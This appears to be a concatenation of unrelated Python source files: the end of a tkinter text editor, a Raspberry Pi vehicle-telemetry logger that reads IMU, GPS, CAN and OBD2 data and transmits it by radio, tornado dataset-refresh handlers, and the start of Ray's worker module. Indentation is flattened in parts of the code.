which run a destroy() on a Quit in the GUI to erase self only;
a Quit in the GUI verifies if any changes in self (only) here;
does not intercept window manager border X: doesn't own window;
does not add self to changes tracking list: part of larger app;
"""
def __init__(self, parent=None, loadFirst='', loadEncode=''):
# use Frame-based menus
GuiMaker.__init__(self, parent) # all menus, buttons on
TextEditor.__init__(self, loadFirst, loadEncode) # GuiMaker must init 1st
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.destroy() # erase self Frame but do not quit enclosing app
class TextEditorComponentMinimal(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames without Quit and File menu options;
on startup, removes Quit from toolbar, and either deletes File menu
or disables all its items (possibly hackish, but sufficient); menu and
toolbar structures are per-instance data: changes do not impact others;
Quit in GUI never occurs, because it is removed from available options;
"""
def __init__(self, parent=None, loadFirst='', deleteFile=True, loadEncode=''):
self.deleteFile = deleteFile
GuiMaker.__init__(self, parent) # GuiMaker frame packs self
TextEditor.__init__(self, loadFirst, loadEncode) # TextEditor adds middle
def start(self):
TextEditor.start(self) # GuiMaker start call
for i in range(len(self.toolBar)): # delete quit in toolbar
if self.toolBar[i][0] == 'Quit': # delete file menu items,
del self.toolBar[i] # or just disable file
break
if self.deleteFile:
for i in range(len(self.menuBar)):
if self.menuBar[i][0] == 'File':
del self.menuBar[i]
break
else:
for (name, key, items) in self.menuBar:
if name == 'File':
items.append([1,2,3,4,6])
################################################################################
# standalone program run
################################################################################
def testPopup():
# see PyView and PyMail for component tests
root = Tk()
TextEditorMainPopup(root)
TextEditorMainPopup(root)
Button(root, text='More', command=TextEditorMainPopup).pack(fill=X)
Button(root, text='Quit', command=root.quit).pack(fill=X)
root.mainloop()
def main(): # may be typed or clicked
try: # or associated on Windows
fname = sys.argv[1] # arg = optional filename
except IndexError: # build in default Tk root
fname = None
TextEditorMain(loadFirst=fname).pack(expand=YES, fill=BOTH) # pack optional
mainloop()
if __name__ == '__main__': # when run as a script
#testPopup()
main() # run .pyw for no DOS box
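#-------------------------------------------------------------------------------
# hedged usage sketch, not part of the original PyEdit code: one way a larger
# tkinter application might embed the editor as an attached component frame;
# the host window title and inserted text are illustrative assumptions, and
# the function is never called automatically - run it manually to try it;
#-------------------------------------------------------------------------------
def demoEmbeddedEditor():
    host = Tk()                                            # enclosing application window
    host.title('Host app with embedded PyEdit component')
    editor = TextEditorComponentMinimal(host)              # no Quit or File menu options
    editor.pack(side=TOP, fill=BOTH, expand=YES)           # pack optional: GuiMaker packs self
    editor.setAllText('Embedded, menu-limited PyEdit component\n')
    host.mainloop()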
|
mainThreading.py
|
# Main.py with threading!
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
import smbus #import SMBus module of I2C
import RTIMU
from time import sleep #import
import adafruit_gps
import time
import struct
import board
import busio
import digitalio as dio
from circuitpython_nrf24l01 import RF24
import serial
import os
import can
import obd
import xlwt
from xlwt import Workbook
from math import degrees
global row, buffer, isFinished
row = 1
buffer = [struct.pack("if",-1,-1.0)]*17
isFinished = [False]*4
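# shared state for the sensor threads and the radio transmitter below: each
# buffer slot holds struct.pack("if", field_id, value) - a 1-based field id
# plus a float reading - and (-1, -1.0) marks "no data yet"; slots 0-2 carry
# IMU roll/pitch/yaw, 3-4 GPS lat/long, 5-12 the eight raw CAN data bytes,
# and 13-16 the OBD2 responses; isFinished holds one done-flag per reader
# thread (IMU, GPS, CAN, OBD2) so master() knows when to stop transmitting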
class ExceptionThread(threading.Thread):
    """ ExceptionThread is a class dedicated to handling
        exceptions within specific threads to prevent
        the application from crashing.
    """
    def __init__(self, msg, **kwargs):
        super().__init__(**kwargs)
        self.errmsg = msg
    def run(self):
        # run the target inside this thread; report failures with the
        # supplied message instead of letting the exception kill the logger
        try:
            super().run()
        except Exception:
            print(self.errmsg)
    def execute(self):
        # kept for the __main__ block below: just starts the thread
        self.start()
def MPU_Init():
#write to sample rate register
bus.write_byte_data(Device_Address, SMPLRT_DIV, 7)
#Write to power management register
bus.write_byte_data(Device_Address, PWR_MGMT_1, 1)
#Write to Configuration register
bus.write_byte_data(Device_Address, CONFIG, 0)
#Write to Gyro configuration register
bus.write_byte_data(Device_Address, GYRO_CONFIG, 24)
#Write to interrupt enable register
bus.write_byte_data(Device_Address, INT_ENABLE, 1)
def read_raw_data(addr):
#Accelero and Gyro value are 16-bit
high = bus.read_byte_data(Device_Address, addr)
low = bus.read_byte_data(Device_Address, addr+1)
#concatenate higher and lower value
value = ((high << 8) | low)
#to get signed value from mpu6050
    if value >= 32768:                  # two's complement: 0x8000-0xFFFF are negative
        value = value - 65536
return value
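# hedged usage note, not part of the original script: read_raw_data() returns
# a signed 16-bit count; with the MPU6050 default +/-2g accelerometer range
# (16384 LSB/g) and the +/-2000 deg/s gyro range selected by GYRO_CONFIG=24
# (16.4 LSB per deg/s), a caller might convert roughly like:
#   Ax = read_raw_data(ACCEL_XOUT_H) / 16384.0     # acceleration in g
#   Gx = read_raw_data(GYRO_XOUT_H) / 16.4         # angular rate in deg/s
# (these register constants are defined, commented out, in the __main__ block)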
def loopIMU(num,sheet):
"""
Function to print IMU Data in a Loop
"""
print("Initializing IMU")
SETTINGS_FILE = "/home/pi/SeniorDesign_159/Hermes_T_Box/IMU/RTEllipsoidFit/RTIMULib.ini"
s = RTIMU.Settings(SETTINGS_FILE)
imu = RTIMU.RTIMU(s)
if (not imu.IMUInit()):
print("Failed to initialize IMU")
isIMU = False
exit(1)
else:
print("Recording IMU Data")
imu.setSlerpPower(0.01)
imu.setGyroEnable(True)
imu.setAccelEnable(True)
imu.setCompassEnable(True)
poll_interval = imu.IMUGetPollInterval()
roll = ""
pitch = ""
yaw = ""
while(num>0):
if imu.IMURead():
data = imu.getIMUData()
#print("Hello")
fusionPose = data["fusionPose"]
#global roll, pitch, yaw
roll = degrees(fusionPose[0])
pitch = degrees(fusionPose[1])
yaw = degrees(fusionPose[2])
global buffer
buffer[0] = struct.pack("if",1,roll)
buffer[1] = struct.pack("if",2,pitch)
buffer[2] = struct.pack("if",3,yaw)
global row
sheet.write(row, 0, str(roll))
sheet.write(row, 1, str(pitch))
sheet.write(row, 2, str(yaw))
row+=1
num-=1
#print ("Gx=%.2f" %Gx, u'\u00b0'+ "/s", "\tGy=%.2f" %Gy, u'\u00b0'+ "/s", "\tGz=%.2f" %Gz, u'\u00b0'+ "/s", "\tAx=%.2f g" %Ax, "\tAy=%.2f g" %Ay, "\tAz=%.2f g" %Az)
sleep(.01)
global isFinished
isFinished[0] = True
def loopGPS(num,sheet):
"""
    Function to print GPS Data in a Loop
"""
uart = serial.Serial("/dev/ttyUSB0", baudrate=9600,timeout=10)
gps = adafruit_gps.GPS(uart,debug=False)
gps.send_command(b'PMTK314,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')
gps.send_command(b'PMTK220,10')
last_print = time.monotonic()
while num>0:
# Make sure to call gps.update() every loop iteration and at least twice
# as fast as data comes from the GPS unit (usually every second).
# This returns a bool that's true if it parsed new data (you can ignore it
# though if you don't care and instead look at the has_fix property).
#print("h")
#print(gps.readline())
gps.update()
# Every second print out current location details if there's a fix.
current = time.monotonic()
if current - last_print >= .010:
num-=1
last_print = current
if not gps.has_fix:
# Try again if we don't have a fix yet.
#print('Waiting for fix...\n')
continue
# We have a fix! (gps.has_fix is true)
# Print out details about the fix like location, date, etc.
print('=' * 40) # Print a separator line.
print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(
gps.timestamp_utc.tm_mon, # Grab parts of the time from the
gps.timestamp_utc.tm_mday, # struct_time object that holds
gps.timestamp_utc.tm_year, # the fix time. Note you might
gps.timestamp_utc.tm_hour, # not get all data like year, day,
gps.timestamp_utc.tm_min, # month!
gps.timestamp_utc.tm_sec))
gps_lat = gps.latitude
gps_long = gps.longitude
global buffer
buffer[3] = struct.pack("if",4,gps_lat)
buffer[4] = struct.pack("if",5,gps_long)
print('Latitude: {0:.6f} degrees'.format(gps_lat))
print('Longitude: {0:.6f} degrees'.format(gps_long))
global row
sheet.write(row, 3, str(gps_lat))
sheet.write(row, 4, str(gps_long))
#print('Fix quality: {}'.format(gps.fix_quality))
# Some attributes beyond latitude, longitude and timestamp are optional
# and might not be present. Check if they're None before trying to use!
# if gps.satellites is not None:
# print('# satellites: {}'.format(gps.satellites))
# if gps.altitude_m is not None:
# print('Altitude: {} meters'.format(gps.altitude_m))
# if gps.speed_knots is not None:
# print('Speed: {} knots'.format(gps.speed_knots))
# if gps.track_angle_deg is not None:
# print('Track angle: {} degrees'.format(gps.track_angle_deg))
# if gps.horizontal_dilution is not None:
# print('Horizontal dilution: {}'.format(gps.horizontal_dilution))
# if gps.height_geoid is not None:
# print('Height geo ID: {} meters'.format(gps.height_geoid))
print("\n")
global isFinished
isFinished[1] = True
def loopCAN(num,sheet):
print("Opening Can Bus")
print("Check CAN WIRES If Outputs Are Weird!")
os.system('sudo ip link set can0 up type can bitrate 500000')
bus = can.Bus(bustype = 'socketcan',channel='can0')
canbus = bus.recv(0.01)
global buffer
while(num>0):
c = bus.recv(0.01)
if(c!=None):
canbus = list(c.data)
for i,val in enumerate(canbus):
buffer[5+i] = struct.pack("if",5+i+1,val)
global row
sheet.write(row, 5, str(canbus))
#print(canbus)
num-=1
global isFinished
isFinished[2] = True
os.system("sudo ip link set can0 down")
def loopOBD2(num,sheet):
print("Starting OBD2 Reading.. ")
connection = obd.OBD("/dev/ttyUSB1")
carCommands = [obd.commands.ENGINE_LOAD,
# obd.commands.COOLANT_TEMP,
# obd.commands.FUEL_PRESSURE,
obd.commands.RPM,
obd.commands.SPEED,
# obd.commands.INTAKE_TEMP,
# obd.commands.MAF,
obd.commands.THROTTLE_POS]
while(connection.is_connected() and num>0):
respCommands = []
for c in carCommands:
respCommands.append(str(connection.query(c).value))
        global buffer
        for i, val in enumerate(respCommands):
            # struct.pack needs a float; responses stringify as 'number unit'
            try: numeric = float(val.split()[0])
            except (ValueError, IndexError): numeric = -1.0    # e.g. a 'None' response
            buffer[13+i] = struct.pack("if", 13+i+1, numeric)
# buffer[13:17] = respCommands
global row
sheet.write(row, 6, str(respCommands[0]))
sheet.write(row, 7, str(respCommands[1]))
sheet.write(row, 8, str(respCommands[2]))
sheet.write(row, 9, str(respCommands[3]))
num-=1
time.sleep(0.01)
global isFinished
isFinished[3] = True
def master(nrf):
    """Transmits the packed sensor records until all reader loops finish"""
# set address of RX node into a TX pipe
nrf.open_tx_pipe(address)
# ensures the nRF24L01 is in TX mode
nrf.listen = False
global isFinished, buffer
start = time.monotonic()
success_percentage = 0
while (False in isFinished):
result = nrf.send(list(filter(lambda i: i!=struct.pack("if",-1,-1.0), buffer)))
success_percentage += result.count(True)
print("Total Sent: ", success_percentage)
print("Total Time: ", time.monotonic() - start)
print('Transmission Speed', (time.monotonic() - start)/success_percentage)
# for ind,val in enumerate(buffer):
# if(val!=-1):
# buf = struct.pack('<if', ind,val)
# # 'i' means a single 4 byte int value.
# # '<' means little endian byte order. this may be optional
## print("Sending: {} as struct: {}".format(ind, val))
# now = time.monotonic() * 1000 # start timer
# result = nrf.send(buf)
# if result is None:
# pass
## print('send() timed out')
# elif not result:
# pass
## print('send() failed')
# else:
## print('send() successful')
# total+=time.monotonic() * 1000 - now
# count+=1
# # print timer results despite transmission success
# #print('Transmission took',
# # time.monotonic() * 1000 - now, 'ms')
# print("Total time :",time.monotonic() - start)
# print("Total Transmitted: ", count)
# print("Average Transmission Time for a Data Value: ",str((time.monotonic()- start)/count))
#time.sleep(0.25)
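# hedged decoding sketch, not part of the original script: every payload sent
# by master() is one 8-byte struct.pack("if", field_id, value) record; a
# receiver that already has such a payload in hand could decode it like this
# (the field-name table simply mirrors the buffer layout described above)
def decode_payload(payload):
    field_id, value = struct.unpack("if", payload)           # 4-byte int + 4-byte float
    names = {1: 'roll', 2: 'pitch', 3: 'yaw', 4: 'gps_lat', 5: 'gps_long'}
    return names.get(field_id, 'field_%d' % field_id), value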
if __name__ == "__main__":
# #some MPU6050 Registers and their Address
# PWR_MGMT_1 = 0x6B
# SMPLRT_DIV = 0x19
# CONFIG = 0x1A
# GYRO_CONFIG = 0x1B
# INT_ENABLE = 0x38
# ACCEL_XOUT_H = 0x3B
# ACCEL_YOUT_H = 0x3D
# ACCEL_ZOUT_H = 0x3F
# GYRO_XOUT_H = 0x43
# GYRO_YOUT_H = 0x45
# GYRO_ZOUT_H = 0x47
#
# bus = smbus.SMBus(1) # or bus = smbus.SMBus(0) for older version boards
# Device_Address = 0x68 # MPU6050 device address
#
# MPU_Init()
# Workbook is created
wb = Workbook()
# add_sheet is used to create sheet.
sheet1 = wb.add_sheet('Hermes Telemetry Data',cell_overwrite_ok=True)
sheet1.write(0, 0, "Roll")
sheet1.write(0, 1, "Pitch")
sheet1.write(0, 2, "Yaw")
sheet1.write(0, 3, "GPS Lat")
sheet1.write(0, 4, "GPS Long")
sheet1.write(0, 5, "CAN Bus")
sheet1.write(0, 6, "Engine Load")
sheet1.write(0, 7, "RPM")
sheet1.write(0, 8, "Speed")
sheet1.write(0, 9, "Throttle Pos")
# addresses needs to be in a buffer protocol object (bytearray)
address = b'1Node'
# change these (digital output) pins accordingly
ce = dio.DigitalInOut(board.D4)
csn = dio.DigitalInOut(board.D5)
# using board.SPI() automatically selects the MCU's
# available SPI pins, board.SCK, board.MOSI, board.MISO
spi = busio.SPI(board.SCLK_1,board.MOSI_1,board.MISO_1) # init spi bus object
# we'll be using the dynamic payload size feature (enabled by default)
# initialize the nRF24L01 on the spi bus object
nrf = RF24(spi, csn, ce)
nrf.data_rate = 2
# help(nrf)
# creating thread
# t1 = threading.Thread(target=loopIMU, args=(100,))
# t2 = threading.Thread(target=loopGPS, args=(10,))
# t3 = threading.Thread(target=loopCAN, args=(10,))
# t4 = threading.Thread(target=loopOBD2, args=(10,))
# # starting thread 1
# t1.start()
# # starting thread 2
# t2.start()
# # starting thread 3
# t3.start()
# # starting thread 4
# t4.start()
#
# # wait until thread 1 is completely executed
# t1.join()
# # wait until thread 2 is completely executed
# t2.join()
# # wait until thread 3 is completely executed
# t3.join()
# # wait until thread 4 is completely executed
# t4.join()
t1 = ExceptionThread("IMU Sensor Failed!",target=loopIMU, args=(1000,sheet1))
t2 = ExceptionThread("GPS Sensor Failed!",target=loopGPS, args=(1000,sheet1,))
t3 = ExceptionThread("CAN Bus Failed!",target=loopCAN, args=(1000,sheet1,))
t4 = ExceptionThread("OBD2 Connection Failed!",target=loopOBD2, args=(1000,sheet1,))
t5 = ExceptionThread("Transmission Failed!",target=master, args=(nrf,))
t1.execute()
t2.execute()
t3.execute()
t4.execute()
t5.execute()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
wb.save('HermesTelemetryData.xls')
# both threads completely executed
|
datasets.py
|
from __future__ import absolute_import, print_function, division
import logging
import os
import tornado.web
import yaml
from tornado import gen
from threading import Thread
from .common import BaseHandler
from ..web_datasets import DATASETS
class RefreshHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
self.write('''<form action='refresh' method='POST'>
<input type='submit' value='Refresh Data'>
</form>''')
@gen.coroutine
def post(self):
logging.info('Refreshing datasets')
for ds in self.all_datasets():
yield gen.Task(RefreshHandler._reload, ds)
self.redirect('/datasets')
@staticmethod
def _reload(ds, callback=None):
t = Thread(target=lambda: callback(ds.reload()))
t.daemon = True
t.start()
class RemovalHandler(BaseHandler):
def post(self):
ds = self.request_one_ds('kind', 'name')
if not ds.user_added:
return self.visible_error(403, 'Cannot remove this dataset.')
logging.info('Removing user-added dataset: %s', ds)
del DATASETS[ds.kind][ds.name]
self.redirect('/datasets')
# Remove the dataset from user-uploaded files.
config_path = os.path.join(os.path.dirname(__file__),
'../../uploads/user_data.yml')
if os.path.exists(config_path):
config = yaml.safe_load(open(config_path))
entry = config[ds.kind].pop(ds.name)
os.remove(entry['file'])
yaml.safe_dump(config, open(config_path, 'w'), allow_unicode=True)
class NightlyRefreshHandler(BaseHandler):
@gen.coroutine
def post(self):
ip = self.request.remote_ip
allowed_ips = self.application.settings['nightly_refresh_ips']
if ip not in allowed_ips:
logging.info('Invalid remote ip {} for nightly refresh'.format(ip))
self.redirect('/login?next=%2Frefresh')
return
logging.info('Refreshing datasets for ip {} after nightly'.format(ip))
for ds in self.all_datasets():
yield gen.Task(RefreshHandler._reload, ds)
return
routes = [
(r'/_remove_dataset', RemovalHandler),
(r'/refresh', RefreshHandler),
(r'/nightly-refresh', NightlyRefreshHandler),
]
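# hedged wiring sketch, not part of the original module: one way the route
# table above could be mounted on a tornado Application for serving
def _example_make_app(refresh_ips=('127.0.0.1',)):
    """Build an Application from `routes`; the 'nightly_refresh_ips' setting
    name comes from NightlyRefreshHandler above, while the cookie_secret value
    and login_url path are illustrative assumptions only."""
    return tornado.web.Application(
        routes,
        login_url='/login',                        # used by @tornado.web.authenticated
        cookie_secret='change-me',                 # required for secure (login) cookies
        nightly_refresh_ips=list(refresh_ips))     # consulted by NightlyRefreshHandler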
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray.util.scheduling_strategies import SchedulingStrategyT
from ray._private.gcs_pubsub import gcs_pubsub_enabled, GcsPublisher, \
GcsErrorSubscriber, GcsLogSubscriber, GcsFunctionKeySubscriber
from ray._private.runtime_env.py_modules import upload_py_modules_if_needed
from ray._private.runtime_env.working_dir import upload_working_dir_if_needed
from ray._private.runtime_env.constants import RAY_JOB_CONFIG_JSON_ENV_VAR
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import (_internal_kv_initialized,
_initialize_internal_kv,
_internal_kv_reset, _internal_kv_get)
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
        # TODO: clean up the SerializationContext once the job has finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return self.core_worker.get_current_runtime_env()
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
        # called by `register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
            raise TypeError(
                "Calling 'put' on a ray.ObjectRef is not allowed "
                "(similarly, returning a ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address),
# If the owner address is set, then the initial reference is
# already acquired internally in CoreWorker::CreateOwned.
# TODO(ekl) we should unify the code path more with the others
# to avoid this special case.
skip_adding_local_ref=(owner_address is not None))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
            timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
                raise TypeError(
                    f"Attempting to call `get` on the value {object_ref}, "
                    "which is not a ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.gcs_client.internal_kv_put(
b"Lock:" + key, b"1", False,
ray_constants.KV_NAMESPACE_FUNCTION_TABLE) == 0
if function_exported is True:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.gcs_client.internal_kv_put(
key,
pickle.dumps({
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
}), True, ray_constants.KV_NAMESPACE_FUNCTION_TABLE)
self.function_actor_manager.export_key(key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
if self.gcs_pubsub_enabled:
subscriber = self.gcs_log_subscriber
subscriber.subscribe()
else:
subscriber = self.redis_client.pubsub(
ignore_subscribe_messages=True)
subscriber.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_hex = self.current_job_id.hex()
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
if self.gcs_pubsub_enabled:
msg = subscriber.poll()
else:
msg = subscriber.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
if self.gcs_pubsub_enabled:
data = msg
else:
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_hex != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
subscriber.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
